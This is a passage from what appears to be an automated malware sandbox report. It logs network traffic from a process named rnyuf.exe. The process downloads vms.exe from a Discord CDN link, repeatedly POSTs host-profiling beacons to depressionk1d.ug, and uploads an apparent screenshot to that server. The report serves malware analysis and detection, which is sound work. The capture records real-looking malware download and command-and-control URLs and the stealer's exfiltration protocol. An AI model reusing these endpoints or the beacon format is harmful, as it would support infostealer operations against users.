                          Data Ascii: ed.2YFywfg<VG#Blz?gW^9T5WMgNN%CV]9>zh<Akv[h(BKrW8qQB}n1nT#C<j-t80Q~!~fzUli0HPJLO X`&
                          Nov 12, 2021 22:23:31.258423090 CET4167OUTData Raw: fd b9 33 78 2f fe 11 d9 6c d1 d8 4d 1b a5 e6 fc 3a c6 9b c8 8c 8c 72 03 48 c4 1c f1 92 3d 30 f1 af cb fd b3 6f a8 7d 8a 36 48 ac 23 b0 96 de 47 25 66 8c 44 22 6c 91 82 37 0c 9e 3a 1f 5c 55 7e fe ef fa e9 fe 64 3f 63 fd 7a ff 00 95 cb 96 d0 78 7b
                          Data Ascii: 3x/lM:rH=0o}6H#G%fD"l7:\U~d?czx{PtkYZ[\F5r!*$FnTPyB_GC]i6z4uXXKS6F_M8q{rKL5_Xm-bKU
                          Nov 12, 2021 22:23:31.258541107 CET4187OUTData Raw: e2 bd cc fc 1a f0 77 fc fa dd 7f e0 4b 57 8c fc 39 ff 00 92 85 a2 7f d7 c7 f4 35 f4 9d ce aa d0 df bd 9c 3a 75 dd dc 89 12 4a e6 13 18 0a 18 b0 1f 7d d7 9f 91 ba 57 9f 8a 73 f6 96 8b e9 dc ef c3 28 72 5e 4b af 63 90 ff 00 85 35 e0 ef f9 f6 ba ff
                          Data Ascii: wKW95:uJ}Ws(r^Kc5w*\$c1P+-Vh,]pGyMsf_'3}}U+(,+}wc~4Vd8^]f{tp(;
                          Nov 12, 2021 22:23:31.258609056 CET4193OUTData Raw: ca a0 53 82 d5 e4 d3 e4 ee 05 48 2c 40 fb ce a3 f1 ac dd 58 9a 2a 2c a0 57 e5 3f 4a f1 7f 88 df f2 16 b6 1f f4 c7 ff 00 66 35 ee cf 15 b4 68 77 4c bd 3d 6b c2 be 23 90 75 a8 36 1c af 95 c1 ff 00 81 1a e9 c2 ca ed 9c f8 88 72 c9 1e 52 7a 51 4a 7a
                          Data Ascii: SH,@X*,W?Jf5hwL=k#u6rRzQJzRf={`Y?+2:'|l|W5T-KIlrWM_Wz-><8S^VJ5_Y7NIvg4)1h0>e
                          Nov 12, 2021 22:23:31.258771896 CET4198OUTData Raw: 70 a7 63 8a bb 11 71 80 54 8a bc d0 16 9f 8c 55 24 4b 62 81 4a 7a 50 0e 05 30 b6 6a f6 24 00 c9 a9 00 a1 16 a4 db 4d 22 5c 86 01 4f c5 28 5a 70 15 49 12 d8 98 a5 02 9c 05 2e 2a ac 45 c6 e2 94 0a 76 29 e0 7b 55 58 9b 8d 51 4e c5 38 0a 70 15 56 25
                          Data Ascii: pcqTU$KbJzP0j$M"\O(ZpI.*Ev){UXQN8pV%iiR78v)h&qFxZpZv'm8)PKP8JpOjv'%<%L%9`('%.%(J\sUVuh 'rK<)yYK;a0I!Uo9u0D-jEow
                          Nov 12, 2021 22:23:31.306467056 CET4232INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.449784162.159.129.23380C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:07.067578077 CET1150OUTGET /attachments/878034206570209333/908810887417176084/vms.exe HTTP/1.1
                          Host: cdn.discordapp.com
                          Nov 12, 2021 22:23:07.094263077 CET1151INHTTP/1.1 301 Moved Permanently
                          Date: Fri, 12 Nov 2021 21:23:07 GMT
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Cache-Control: max-age=3600
                          Expires: Fri, 12 Nov 2021 22:23:07 GMT
                          Location: https://cdn.discordapp.com/attachments/878034206570209333/908810887417176084/vms.exe
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qQuNkV0jaurDDEKier5UVYlTt9nakMd515b1chpPiHOeWcNqL4ppDIlfxRN%2B3ncDJ3jt79lbSkQLvdH2ixJZ2qJ3fBzTCfS4Yi3n93MP4E9dMB3BXZyNaUcHWeEHYfJetBIxqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 6ad2d1d13e8de003-FRA
                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                          Data Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          40192.168.2.449824178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.275063038 CET4213OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:31.301870108 CET4231INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          41192.168.2.449825178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.432215929 CET4232OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:31.458420038 CET4233INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          42192.168.2.449826178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.602646112 CET4233OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:31.627692938 CET4234INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          43192.168.2.449827178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.760157108 CET4234OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:31.785746098 CET4235INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          44192.168.2.449828178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.863842010 CET4235OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:31.864084959 CET4236OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:31.864485025 CET4246OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:31.864793062 CET4248OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:31.887203932 CET4257OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:31.887238026 CET4259OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:31.887278080 CET4265OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:31.887358904 CET4268OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:31.887387991 CET4271OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:31.887415886 CET4274OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:31.909944057 CET4280OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:31.960405111 CET4346INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          45192.168.2.449829178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:31.915643930 CET4326OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:31.941987991 CET4345INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:31 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          46192.168.2.449830178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:32.073916912 CET4347OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:32.100353003 CET4348INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          47192.168.2.449831178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:32.230894089 CET4348OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:32.256362915 CET4349INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          48192.168.2.449832178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:32.386087894 CET4349OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:32.414083004 CET4350INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:32 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:32.438690901 CET4350OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:32.438797951 CET4350OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:32.438980103 CET4360OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:32.439047098 CET4363OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:32.464078903 CET4384OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:32.464206934 CET4389OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:32.487014055 CET4400OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:32.487097025 CET4427OUTData Raw: a4 20 a2 92 8a 00 70 3c 62 83 48 3a d2 9a 77 01 28 a5 e9 45 00 02 96 92 96 81 31 69 28 a2 98 87 0a 5a 41 4b 4c 1e e1 4b 8a 4a 5a 62 02 29 3b d2 d2 1a 00 05 38 50 28 a0 40 29 c2 9a 69 45 50 98 ea 28 a5 1d 69 88 51 4a 28 14 b4 d1 22 af a5 29 18 a4
                          Data Ascii: p<bH:w(E1i(ZAKLKJZb);8P(@)iEP(iQJ(")ykbDE XC8SH*,()Bbu'Zx6\bLB)vRBQIR`$xQjRZh+Tbc|*LQVfKLRF(xN)Mpd=))H(
                          Nov 12, 2021 22:23:32.487154007 CET4437OUTData Raw: 57 73 75 c2 c0 80 0f c0 00 2b af ff 00 84 73 43 ff 00 a0 36 9d ff 00 80 a9 fe 14 db fb 2b 4b 0f 0e 6a 51 59 da c3 6f 19 b6 95 8a 43 18 40 4e c3 ce 07 7e 05 2c 66 61 4e bd 37 08 c6 cc ac 1e 5f 52 85 55 39 4a e8 f8 e6 97 bd 18 a0 0a 8b 1a 85 2d 14
                          Data Ascii: Wsu+sC6+KjQYoC@N~,faN7_RU9J-%#B^=F6Wo1+oL<R},[[`Jr</_;5]\ic7sKPZxKK$ps+5{{sw+n|kL-c
                          Nov 12, 2021 22:23:32.487270117 CET4441OUTData Raw: d6 b4 ab c3 6a ca 2e 96 de 49 09 81 4b 6d 2e 49 40 1d 41 20 13 19 6e a0 f4 e6 9c 63 4d 3b a0 7c db 18 54 56 a5 e6 81 7b a7 ff 00 69 7d a8 c5 1f f6 7c eb 6e e4 b1 fd e3 b6 70 13 8e 72 a0 b6 78 18 1e e3 39 75 aa 92 7b 10 d3 5b 85 15 72 2d 3a 69 b4
                          Data Ascii: j.IKm.I@A ncM;|TV{i}|nprx9u{[r-:i{M^1E"w&yyekm7rLdSK9OCI-xSxcV[rsF{A+S.mKo-E82Fqvxx>{*[;5I,#
